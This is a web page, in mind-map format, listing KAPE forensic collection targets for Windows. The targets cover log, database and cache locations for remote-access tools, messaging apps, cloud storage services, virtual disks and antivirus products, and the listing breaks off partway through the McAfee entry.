Kategorier: Alle - forensics - files - history - browsers

av robert pascal 5 år siden

1393

Inforensique windows

Digital forensic investigations on Windows systems often focus on tracking user activities through various artifacts. Web browsers, for example, maintain detailed logs of files opened and downloaded, including the date and time of access.

Inforensique windows

Kape

Target

Apps
VNC

Description: VNC Logs

Author: Phill Moore

Version: 1.1

Id: b98dab2e-81f3-472e-a22a-05269ad16270

RecreateDirectories: true

Targets:

   -

       Name: RealVNC Log

       Category: ApplicationLogs

       Path: C:\Users\*\AppData\Local\RealVNC\vncserver.log

       IsDirectory: false

       Recursive: false

       Comment: "https://www.realvnc.com/en/connect/docs/logging.html#logging"

   -

       Name: RealVNC Application Logs

       Category: EventLogs

       Path: ApplicationEvents.tkape

       IsDirectory: false

       Recursive: false

       Comment: "Contains RealVNC entries, event source: VNC Server"

TeraCopy

Description: 'TeraCopy log history'

Author: Kevin Pagano

Version: 1

Id: 111ee9ac-f8b3-4026-a3c9-90f76b6b2cb4

RecreateDirectories: true

Targets:

   -

       Name: TeraCopy

       Category: TeraCopy

       Path: C:\Users\*\AppData\Roaming\TeraCopy

       IsDirectory: true

       Recursive: true

       Comment: ""

TeamViewer

Description: Team Viewer Logs

Author: Hadar Yudovich

Version: 1.1

Id: 6f2cd531-1f4b-4f0b-aa96-2426621b0a14

RecreateDirectories: true

Targets:

   -

       Name: TeamViewer Connection Logs

       Category: Communications

       Path: C:\Program Files*\TeamViewer\connections*.txt

       IsDirectory: false

       Recursive: false

       Comment: "Includes connections_incoming.txt and connections.txt"

   -

       Name: TeamViewer Application Logs

       Category: ApplicationLogs

       Path: C:\Program Files*\TeamViewer\TeamViewer*_Logfile*

       IsDirectory: false

       Recursive: false

       Comment: "Includes TeamViewer<version>_Logfile.log and TeamViewer<version>_Logfile_OLD.log"

   -

       Name: TeamViewer Configuration Files

       Category: ApplicationLogs

       Path: C:\Users\*\AppData\Roaming\TeamViewer\MRU\RemoteSupport

       IsDirectory: true

       Recursive: true

       Comment: "Includes miscellaneous config files"

Description: Skype

Author: Eric Zimmerman

Version: 3

Id: d7b0b49c-16bb-4b32-9f57-2d918acaebbc

RecreateDirectories: true

Targets:

   -

       Name: main.db (App <v12)

       Category: Communications

       Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\*\main.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: skype.db (App +v12)

       Category: Communications

       Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\*\skype.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: main.db XP

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Skype\*\main.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: main.db Win7+

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Skype\*\main.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: s4l-[username].db (App +v8)

       Category: Communications

       Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\s4l-*.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: leveldb (Skype for Desktop +v8)

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\*.leveldb\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""       

ScreenConnect

Description: ScreenConnect Data (now known as ConnectWise Control)

Author: Drew Ervin

Version: 1.0

Id: 26c80b79-b3c0-4378-abe8-a5a6c9aebb4f

RecreateDirectories: true

Targets:

   -

       Name: ScreenConnect Session Database

       Category: ApplicationLogs

       Path: C:\Program Files*\ScreenConnect\App_Data\Session.db

       IsDirectory: false

       Recursive: false

       Comment: "SQLite database with session information"

   -

       Name: ScreenConnect Session Database

       Category: ApplicationLogs

       Path: C:\Program Files*\ScreenConnect\App_Data\User.xml

       IsDirectory: false

       Recursive: false

       Comment: "Contains each user's last authenticated time"

   -

       Name: ScreenConnect Application Events

       Category: EventLogs

       Path: ApplicationEvents.tkape

       IsDirectory: false

       Recursive: false

       Comment: "Contains ScreenConnect entries, source: ScreenConnect Client"

OutlookPSTOST

Description: Outlook PST and OST files

Author: Eric Zimmerman

Version: 1

Id: f91909c4-bba1-40d6-a3bc-39d060843a09

RecreateDirectories: true

Targets:

   -

       Name: PST XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Outlook\*.pst

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: OST XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Outlook\*.ost

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: PST

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Outlook\*.pst

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: OST

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Outlook\*.ost

       IsDirectory: false

       Recursive: false

       Comment: ""

Notepad++

Description: Notepad++ backup

Author: Banaanhangwagen

Version: 1

Id: dc6c1009-2d0a-4ead-99f0-d1f3a5380751

RecreateDirectories: true

Targets:

   -

       Name: Notepad++ backup

       Category: Text Editor

       Path: C:\Users\*\AppData\Roaming\Notepad++\backup

       IsDirectory: True

       Recursive: True

       Comment: "Locates non-saved Notepad++ files and copies them."

OneDrive

Description: Microsoft OneDrive Storage Files and Metadata

Author: Chad Tilbury

Version: 1

Id: f3c680ca-0646-48cc-a471-5f484e22b1cf

RecreateDirectories: true

Targets:

   -

       Name: OneDrive User Files

       Category: Apps

       Path: C:\Users\*\OneDrive*\

       IsDirectory: True

       Recursive: True

       FollowReparsePoint: True

       FollowSymbolicLinks: True

       Comment: "Caution -- This target will collect OneDrive contents from the local drive AND on-demand cloud files. Ensure your scope of authority permits cloud collections before use"

   -

       Name: OneDrive Metadata Logs

       Category: Apps

       Path: C:\Users\*\AppData\Local\Microsoft\OneDrive\logs\

       IsDirectory: True

       Recursive: True

       Comment: ""

   -

       Name: OneDrive Metadata Settings

       Category: Apps

       Path: C:\Users\*\AppData\Local\Microsoft\OneDrive\settings\

       IsDirectory: True

       Recursive: True

       Comment: ""

LogMeIn

Description: LogMeIn Data

Author: Drew Ervin

Version: 1.0

Id: 488e9de2-ecb6-4b27-88a3-719715147c33

RecreateDirectories: true

Targets:

   -

       Name: LogMeIn ProgramData Logs

       Category: ApplicationLogs

       Path: C:\ProgramData\LogMeIn\Logs

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: LogMeIn Application Events

       Category: EventLogs

       Path: ApplicationEvents.tkape

       IsDirectory: false

       Recursive: false

       Comment: "Contains LogMeIn entries, event source: LogMeIn"

   -

       Name: LogMeIn Application Logs

       Category: ApplicationLogs

       Path: C:\Users\*\AppData\Local\temp\LogMeInLogs

       IsDirectory: true

       Recursive: true

       Comment: "Contains RemoteAssist (formerly GoToAssist), GoToMeeting, and other GoTo* logs"

Kaseya

Description: Kaseya Data

Author: Drew Ervin

Version: 1.0

Id: bb83f860-5a10-4471-821e-9ef4ab6f856c

RecreateDirectories: true

Targets:

   -

       Name: Kaseya Live Connect Logs (XP)

       Category: ApplicationLogs

       Path: C:\Documents and Settings\*\Application Data\Kaseya\Log

       IsDirectory: true

       Recursive: true

       Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"

   -

       Name: Kaseya Live Connect Logs

       Category: ApplicationLogs

       Path: C:\Users\*\AppData\Local\Kaseya\Log\KaseyaLiveConnect

       IsDirectory: true

       Recursive: true

       Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"

   -

       Name: Kaseya Agent Endpoint Service Logs (XP)

       Category: ApplicationLogs

       Path: C:\Documents and Settings\All Users\Application Data\Kaseya\Log\Endpoint

       IsDirectory: true

       Recursive: true

       Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"

   -

       Name: Kaseya Agent Endpoint Service Logs

       Category: ApplicationLogs

       Path: C:\ProgramData\Kaseya\Log\Endpoint

       IsDirectory: true

       Recursive: true

       Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"

   -

       Name: Kaseya Agent Service Log

       Category: ApplicationLogs

       Path: C:\Program Files*\Kaseya\*\agentmon.log*

       IsDirectory: false

       Recursive: false

       Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"

   -

       Name: Kaseya Setup Log

       Category: ApplicationLogs

       Path: C:\Users\*\AppData\Local\Temp\KASetup.log

       IsDirectory: false

       Recursive: false

       Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229011448"

   -

       Name: Kaseya Setup Log

       Category: ApplicationLogs

       Path: C:\Windows*\Temp\KASetup.log

       IsDirectory: false

       Recursive: false

       Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229011448"

JavaWebCache

Description: Java WebStart Cache - (IDX Files)

Author: piesecurity

Version: 1

Id: 4dc2e35c-fc20-45f6-89a6-5d729596c522

RecreateDirectories: true

Targets:

   -

       Name: Java WebStart Cache User Level - Default

       Category: Communication

       Path: C:\Users\*\AppData\Local\Sun\Java\Deployment\cache\*\*\*.idx

       IsDirectory: false

       Recursive: false

   -

       Name: Java WebStart Cache User Level - IE Protected Mode

       Category: Communication

       Path: C:\Users\*\AppData\LocalLow\Sun\Java\Deployment\cache\*\*\*.idx

       IsDirectory: false

       Recursive: false

   -

       Name: Java WebStart Cache System level

       Category: Communication

       Path: C:\Windows*\System32\config\systemprofile\AppData\Local\Sun\Java\Deployment\cache\*\*\*.idx

       IsDirectory: false

       Recursive: false

   -

       Name: Java WebStart Cache System level - IE Protected Mode

       Category: Communication

       Path: C:\Windows*\System32\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment\cache\*\*\*.idx

       IsDirectory: false

       Recursive: false

   -

       Name: Java WebStart Cache System level (SysWow64)

       Category: Communication

       Path: C:\Windows*\SysWOW64\config\systemprofile\AppData\Local\Sun\Java\Deployment\cache\*\*\*.idx

       IsDirectory: false

       Recursive: false

   -

       Name: Java WebStart Cache System level (SysWow64) - IE Protected Mode

       Category: Communication

       Path: C:\Windows*\SysWOW64\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment\cache\*\*\*.idx

       IsDirectory: false

       Recursive: false

   -

       Name: Java WebStart Cache User Level - XP

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Sun\Java\Deployment\cache\*\*\*.idx

       IsDirectory: false

       Recursive: false

CiscoJabber

Description: Jabber

Author: Andrew Bannon

Version: 1.0

Id: 69249cc7-2b04-47c4-8ba9-d8055fadc950

RecreateDirectories: true

Targets:

   -

       Name: Cisco Jabber Database

       Category: Communications

       Path: C:\Users\*\AppData\Local\Cisco\Unified Communications\Jabber\CSF\History\*.db

       IsDirectory: false

       Recursive: false

       Comment: "The Cisco Jabber process needs to be killed before database can be copied."

iTunesBackups

Description: iTunes Backups

Author: Tony Knutson

Version: 2

Id: 7b4a98d9-b36a-40be-bacc-ad0102b0a8c3

RecreateDirectories: true

Targets:

   -

       Name: iTunes Backup Folder

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Apple\Mobilesync\Backup

       IsDirectory: True

       Recursive: True

       Comment: ""

   -

       Name: iTunes Backup Folder

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Apple Computer\Mobilesync\Backup

       IsDirectory: True

       Recursive: True

       Comment: ""

   -

       Name: iTunes Backup Folder - iOS13

       Category: Communications

       Path: C:\Users\*\Apple\Mobilesync\Backup       

GoogleDrive

Description: Google Drive Storage Files and Metadata

Author: Chad Tilbury

Version: 1

Id: 34f115e0-687e-49c1-acdd-85cc68a86157

RecreateDirectories: true

Targets:

   -

       Name: Google Drive User Files

       Category: Apps

       Path: C:\Users\*\Google Drive*\

       IsDirectory: True

       Recursive: True

       Comment: "Google Drive Backup and Sync Application"

   -

       Name: Google Drive Metadata

       Category: Apps

       Path: C:\Users\*\AppData\Local\Google\Drive\

       IsDirectory: True

       Recursive: True

       Comment: "Google Drive Backup and Sync Application"

   -

       Name: Google File Stream Metadata

       Category: Apps

       Path: C:\Users\*\AppData\Local\Google\DriveFS\

       IsDirectory: True

       Recursive: True

       Comment: "Google Drive File Stream Application"

FileZilla

Description: FileZilla XML and SQLite Log Files

Author: Dennis Reneau

Version: 1

Id: f7eaa0d5-0b15-4578-b411-ac4226e13a7f

RecreateDirectories: true

Targets:

   -

       Name: FileZilla XML Log Files

       Category: Logs

       Path: C:\Users\*\AppData\Roaming\FileZilla\*.xml*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: FileZilla SQLite3 Log Files

       Category: Logs

       Path: C:\Users\*\AppData\Roaming\FileZilla\*.sqlite3*

       IsDirectory: false

       Recursive: false

       Comment: ""

ExchangeTransport

Description: Exchange Transport Log Files

Author: Keith Twombley

Version: 1

Id: 9bc0a453-50ab-46e8-a424-09dc7022c4a4

RecreateDirectories: true

Targets:

   -

       Name: Exchange TransportRoles log files

       Category: Logs

       Path: C:\Program Files\Microsoft\Exchange Server\*\TransportRoles\Logs\

       IsDirectory: true

       Recursive: true

       FileMask: '*.log'

       Comment: "Highly dependent on Exchange configuration"

Exchange

Description: Exchange Log Files

Author: Keith Twombley

Version: 1

Id: 1b54aafe-5074-4d45-b129-29107ce7f863

RecreateDirectories: true

Targets:

   -

       Name: Exchange client access log files

       Category: Logs

       Path: ExchangeClientAccess.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Exchange TransportRoles log files

       Category: Logs

       Path: ExchangeTransport.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

ExchangeClientAccess

Description: Exchange Client Access Log Files

Author: Keith Twombley

Version: 1

Id: 9e802154-53eb-4cc9-9cca-d2e39f3227d7

RecreateDirectories: true

Targets:

   -

       Name: Exchange client access log files

       Category: Logs

       Path: C:\Program Files\Microsoft\Exchange Server\*\Logging

       IsDirectory: true

       Recursive: true

       FileMask: '*.log'

       Comment: "Highly dependent on Exchange configuration"

Dropbox

Description: Dropbox Cloud Storage Files and Metadata

Author: Chad Tilbury

Version: 1

Id: e8501b5d-2cfc-4693-923d-52edd2ddf3bc

RecreateDirectories: true

Targets:

   -

       Name: Dropbox User Files

       Category: Apps

       Path: C:\Users\*\Dropbox*\

       IsDirectory: True

       Recursive: True

       Comment: ""

   -

       Name: Dropbox Metadata

       Category: Apps

       Path: C:\Users\*\AppData\Local\Dropbox\info.json

       IsDirectory: False

       Recursive: False

       Comment: "Getting individual files because folder may contain very large extraneous files"

   -

       Name: Dropbox Metadata

       Category: Apps

       Path: C:\Users\*\AppData\Local\Dropbox\*\filecache.dbx

       IsDirectory: False

       Recursive: False

       Comment: "Getting individual files because folder may contain very large extraneous files"

   -

       Name: Dropbox Metadata

       Category: Apps

       Path: C:\Users\*\AppData\Local\Dropbox\*\config.dbx

       IsDirectory: False

       Recursive: False

       Comment: "Getting individual files because folder may contain very large extraneous files"

   -

       Name: Windows Protect Folder

       Category: FileSystem

       Path: C:\Users\*\AppData\Roaming\Microsoft\Protect\*\

       IsDirectory: True

       Recursive: True

       Comment: "Required for offline decryption of Dropbox databases"

Discord

Description: Discord cache files

Author: Christian Johansen

Version: 1

Id: 5a44a0ef-db56-4103-8748-797432487028

RecreateDirectories: true

Targets:

   -

       Name: Discord cache files

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\discord\cache

       IsDirectory: true

       Recursive: true

       Comment: "Gets cached data from Discord app"

Confluence

Description: Confluence Log Files

Author: Eric Capuano

Version: 1

Id: 317b3814-b383-4bcf-97a2-3b3d1c5f8ca0

RecreateDirectories: true

Targets:

   -

       Name: Confluence Wiki Log Files

       Category: Logs

       Path: C:\Atlassian\Application Data\Confluence\logs\*.log*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Confluence Wiki Log Files

       Category: Logs

       Path: C:\Program Files\Atlassian\Confluence\logs\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""

CloudStorage

Description: Cloud Storage Contents and Metadata

Author: Chad Tilbury

Version: 1

Id: 29984028-0f42-4922-8a3f-752341f5852c

RecreateDirectories: true

Targets:

   -

       Name: OneDrive

       Category: Apps

       Path: OneDrive.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Google Drive

       Category: Apps

       Path: GoogleDrive.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Dropbox

       Category: Apps

       Path: Dropbox.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Box

       Category: Apps

       Path: BoxDrive.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

BoxDrive

Description: Box Cloud Storage Files and Metadata

Author: Chad Tilbury

Version: 1

Id: 2e3bee53-24b6-4867-8510-7da07d353abc

RecreateDirectories: true

Targets:

   -

       Name: Box User Files

       Category: Apps

       Path: C:\Users\*\Box*\

       IsDirectory: True

       Recursive: True

       FollowReparsePoint: True

       FollowSymbolicLinks: True

       Comment: "Caution -- This target will collect Box Drive contents from the local drive AND on-demand cloud files. Ensure your scope of authority permits cloud collections before use"

   -

       Name: Box Drive Application Metadata

       Category: Apps

       Path: C:\Users\*\AppData\Local\Box\Box\*\

       IsDirectory: True

       Recursive: True

       Comment: ""

   -

       Name: Box Sync Application Metadata

       Category: Apps

       Path: C:\Users\*\AppData\Local\Box Sync\*\

       IsDirectory: True

       Recursive: True

       Comment: ""

AsperaConnec

Description: Aspera Connect Log Files

Author: Dennis Reneau

Version: 1.0

Id: 1f311765-a5c0-496a-a5d5-e79cbd0702e2

RecreateDirectories: true

Targets:

   -

       Name: Aspera Client Logs

       Category: FileDownload

       Path: C:\Users\*\AppData\Local\Aspera\Aspera Connect\var\log\

       FileMask: '*.log'

       IsDirectory: true

       Recursive: true

       Comment: "Locates Aspera Connect .log files and copies them"

   -

       Name: Aspera Server Logs

       Category: FileDownload

       Path: C:\Users\*\.aspera\connect\var\log\

       FileMask: '*.log'

       IsDirectory: true

       Recursive: true

       Comment: "Locates Aspera Connect .log files and copies them"

Ammyy

Description: Ammyy Data

Author: Drew Ervin

Version: 1.0

Id: 606ad937-c32e-49ba-9403-3f1ce501a012

RecreateDirectories: true

Targets:

   -

       Name: Ammyy Program Data

       Category: ApplicationLogs

       Path: C:\ProgramData\Ammyy

       IsDirectory: true

       Recursive: true

       Comment: "May not contain traditional log files, but presence of this folder may indicate historical usage"

MISC
VirtualDisks

Description: Virtual Disks

Author: Phill Moore

Version: 1

Id: 283fd2b7-b914-4683-85b4-40dd3fefecbb

RecreateDirectories: true

Targets:

   -

       Name: VHD

       Category: Disk Images

       Path: C:\

       FileMask: '*.VHD'

       IsDirectory: true

       Recursive: true

       Comment: "VHD"

   -

       Name: VHDX

       Category: Disk Images

       Path: C:\

       FileMask: '*.VHDX'

       IsDirectory: true

       Recursive: true

       Comment: "VHDX"

   -

       Name: VDI

       Category: Disk Images

       Path: C:\

       FileMask: '*.VDI'

       IsDirectory: true

       Recursive: true

       Comment: "VDI"

   -

       Name: VMDK

       Category: Disk Images

       Path: C:\

       FileMask: '*.VMDK'

       IsDirectory: true

       Recursive: true

       Comment: "VMDK"

MiniTimelineCollection

Description: MFT, Registry and Event Logs to generate a mini timeline

Author: Mari DeGrazia

Version: 1

Id: 02e131d6-7784-4302-9495-75536423e414

RecreateDirectories: true

Targets:

   -

       Name: Event Logs

       Category: Event Logs

       Path: EventLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: File System

       Category: File System

       Path: FileSystem.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RegistryHives

       Category: Registry

       Path: RegistryHives.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

KapeTriage

Description: Kape Triage collections that will collect most of the files needed for a DFIR Investigation. This module pulls evidence from File System files, Registry Hives, Event Logs, Scheduled Tasks, Evidence of Execution, SRUM data, Web Browser data (IE/Edge, Chrome, Mozilla history), LNK Files, Jump Lists, 3rd party remote access software logs, 3rd party antivirus software logs. 

Author: Scott Downie

Version: 2.0

Id: a745b730-d6b7-4cb7-9847-4e896d9f3c52

RecreateDirectories: true

Targets:

   -

       Name: FileSystem

       Category: Targets

       Path: FileSystem.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RegistryHives

       Category: Targets

       Path: RegistryHives.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: EventLogs

       Category: Targets

       Path: EventLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ScheduledTasks

       Category: Targets

       Path: ScheduledTasks.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: EvidenceOfExecution

       Category: Targets

       Path: EvidenceOfExecution.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SRUM

       Category: Targets

       Path: SRUM.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: WebBrowsers

       Category: Targets

       Path: WebBrowsers.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: LnkFilesAndJumpLists

       Category: Targets

       Path: LnkFilesAndJumpLists.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RemoteAccess

       Category: Targets

       Path: RemoteAdmin.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: AntiVirus

       Category: Targets

       Path: Antivirus.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

RemoteAdmin

Description: Composite target for files related to remote administration tools

Author: Drew Ervin

Version: 1.2

Id: 31cf5a4e-c44c-4457-b11f-74dca73e141b

RecreateDirectories: true

Targets:

   -

       Name: RDP Logs

       Category: EventLogs

       Path: RDPLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: "Contains Windows Event Logs related to RDP"

   -

       Name: RDP Cache

       Category: ApplicationData

       Path: RDPCache.tkape

       IsDirectory: false

       Recursive: false

       Comment: "Contains data cached during recent RDP sessions"

   -

       Name: LogMeIn

       Category: ApplicationLogs

       Path: LogMeIn.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: VNC

       Category: ApplicationLogs

       Path: VNCLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Chrome Remote Desktop

       Category: ApplicationLogs

       Path: ApplicationEvents.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: TeamViewer

       Category: ApplicationLogs

       Path: TeamViewerLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Ammyy

       Category: Ammyy.tkape

       Path: ApplicationLogs

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Kaseya

       Category: ApplicationLogs

       Path: Kaseya.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ScreenConnect (ConnectWise Control)

       Category: ApplicationLogs

       Path: ScreenConnect.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

Antivirus
WindowsDefender

Description: Windows Defender Data

Author: Drew Ervin

Version: 1.0

Id: 061aa929-292b-4d7f-a4af-a3fe2673a3e5

RecreateDirectories: true

Targets:

   -

       Name: Windows Defender Logs

       Category: Antivirus

       Path: C:\ProgramData\Microsoft\Microsoft AntiMalware\Support\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Windows Defender Event Logs

       Category: EventLogs

       Path: C:\Windows*\System32\winevt\Logs\Microsoft-Windows-WindowsDefender*.evtx

       IsDirectory: false

       Recursive: false

       Comment: ""

Webroot

Description: Webroot Antivirus

Author: Drew Ervin

Version: 1.0

Id: c53c2b4e-075b-4162-b93e-aaf8c968e0b0

RecreateDirectories: true

Targets:

   -

       Name: Webroot Program Data

       Category: Antivirus

       Path: C:\ProgramData\WRData\WRLog.log

       IsDirectory: false

       Recursive: false

       Comment: ""

VIPRE

Description: VIPRE Data

Author: Drew Ervin

Version: 1.0

Id: 8af4ffd8-264e-4c7d-aa28-8cc4f543b01d

RecreateDirectories: true

Targets:

   -

       Name: VIPRE Business Agent Logs

       Category: Antivirus

       Path: C:\ProgramData\VIPRE Business Agent\Logs\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: VIPRE Business User Logs (v7+)

       Category: Antivirus

       Path: C:\Users\*\AppData\Roaming\VIPRE Business\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: VIPRE Business User Logs (v5-v6)

       Category: Antivirus

       Path: C:\Users\*\AppData\Roaming\GFI Software\AntiMalware\Logs\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: VIPRE Business User Logs (up to v4)

       Category: Antivirus

       Path: C:\Users\*\AppData\Roaming\Sunbelt Software\AntiMalware\Logs\

       IsDirectory: true

       Recursive: true

       Comment: ""

TrendMicro

Description: Trend Micro Data

Author: Drew Ervin

Version: 1.0

Id: 73f8ccea-61cf-4993-aa26-e5cad4f8cc8f

RecreateDirectories: true

Targets:

   -   

       Name: Trend Micro Logs

       Category: Antivirus

       Path: C:\ProgramData\Trend Micro\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -   

       Name: Trend Micro Security Agent Report Logs

       Category: Antivirus

       Path: C:\Program Files*\Trend Micro\Security Agent\Report\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""

   -   

       Name: Trend Micro Security Agent Connection Logs

       Category: Antivirus

       Path: C:\Program Files*\Trend Micro\Security Agent\ConnLog\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""

Symantec_AV_Logs

Description: Symantec AV Logs

Author: Brian Maloney

Version: 1.2

Id: 5e750ea2-f6dc-4981-88d1-636ce042aa0d

RecreateDirectories: true

Targets:

   -

       Name: Symantec Endpoint Protection Logs (XP)

       Category: AntiVirus

       Path: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs\AV

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Symantec Endpoint Protection Logs

       Category: AntiVirus

       Path: C:\ProgramData\Symantec\Symantec Endpoint Protection\*\Data\Logs\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Symantec Endpoint Protection User Logs

       Category: AntiVirus

       Path: C:\Users\*\AppData\Local\Symantec\Symantec Endpoint Protection\Logs

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Symantec Event Log Win7+

       Category: EventLogs

       Path: C:\Windows*\system32\winevt\logs\Symantec Endpoint Protection Client.evtx

       IsDirectory: false

       Recursive: false

       Comment: "Symantec specific Windows event log"

   -

       Name: Symantec Endpoint Protection Manager (SEPM) Application Events

       Category: EventLogs

       Path: ApplicationEvents.tkape

       IsDirectory: false

       Recursive: false

       Comment: "Contains SEPM entries, documented here: https://support.symantec.com/us/en/article.tech196455.html"

   -

       Name: Symantec Endpoint Protection Quarantine (XP)

       Category: AntiVirus

       Path: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Symantec Endpoint Protection Quarantine

       Category: AntiVirus

       Path: C:\ProgramData\Symantec\Symantec Endpoint Protection\*\Data\Quarantine

       IsDirectory: true

       Recursive: true

       Comment: ""

SUPERAntiSpyware

Description: SUPERAntiSpyware Data

Author: Drew Ervin

Version: 1.0

Id: 0b2c9e30-8d85-43ea-aa26-b20503b8e1da

RecreateDirectories: true

Targets:

   -

       Name: SUPERAntiSpyware Logs

       Category: Antivirus

       Path: C:\Users\*\AppData\Roaming\SUPERAntiSpyware\Logs\

       IsDirectory: true

       Recursive: true

       Comment: ""

Sophos

Description: Sophos Data

Author: Drew Ervin

Version: 1.0

Id: a50e5204-878e-4b5d-82fb-e6148d976bf7

RecreateDirectories: true

Targets:

   -

       Name: Sophos Logs (XP)

       Category: Antivirus

       Path: C:\Documents and Settings\All Users\Application Data\Sophos\Sophos *\Logs\

       IsDirectory: true

       Recursive: true

       Comment: "Includes Anti-Virus, Client Firewall, Data Control, Device Control, Endpoint Defense, Network Threat Detection, Management Communications System, Patch Control, Tamper Protection"

   -

       Name: Sophos Logs

       Category: Antivirus

       Path: C:\ProgramData\Sophos\Sophos *\Logs\

       IsDirectory: true

       Recursive: true

       Comment: "Includes Anti-Virus, Client Firewall, Data Control, Device Control, Endpoint Defense, Network Threat Detection, Management Communications System, Patch Control, Tamper Protection"

   -

       Name: Sophos Application Events

       Category: Antivirus

       Path: ApplicationEvents.tkape

       IsDirectory: false

       Recursive: false

       Comment: "Event source: Sophos Anti-Virus"

RogueKiller

Description: RogueKiller Anti-Malware (by Adlice Software)

Author: Drew Ervin

Version: 1.0

Id: 089b2afb-cc29-4565-9c2f-cbf0ba50f10d

RecreateDirectories: true

Targets:

   -

       Name: RogueKiller Reports

       Category: Antivirus

       Path: C:\ProgramData\RogueKiller\logs\AdliceReport_*.json

       IsDirectory: false

       Recursive: false

       Comment: ""

McAfee

Description: McAfee Log Files

Author: Sam Smoker

Version: 1.1

Id: d2df019b-35d0-4f7b-8132-7500cbd39901

RecreateDirectories: True

Targets:

   -

       Name: McAfee Desktop Protection Logs XP

       Category: AntiVirus

       Path: C:\Users\All Users\Application Data\McAfee\DesktopProtection

       IsDirectory: true

       Recursive: true

   -

       Name: McAfee Desktop Protection Logs

       Category: AntiVirus

       Path: C:\ProgramData\McAfee\DesktopProtection

       IsDirectory: true

       Recursive: true

   -

       Name: McAfee Endpoint Security Logs

       Category: AntiVirus

       Path: C:\ProgramData\McAfee\Endpoint Security\Logs\

       IsDirectory: true

       Recursive: true

   -

       Name: McAfee Endpoint Security Logs

       Category: AntiVirus

       Path: C:\ProgramData\McAfee\Endpoint Security\Logs_Old\

       IsDirectory: true

       Recursive: true

   -

       Name: McAfee VirusScan Logs

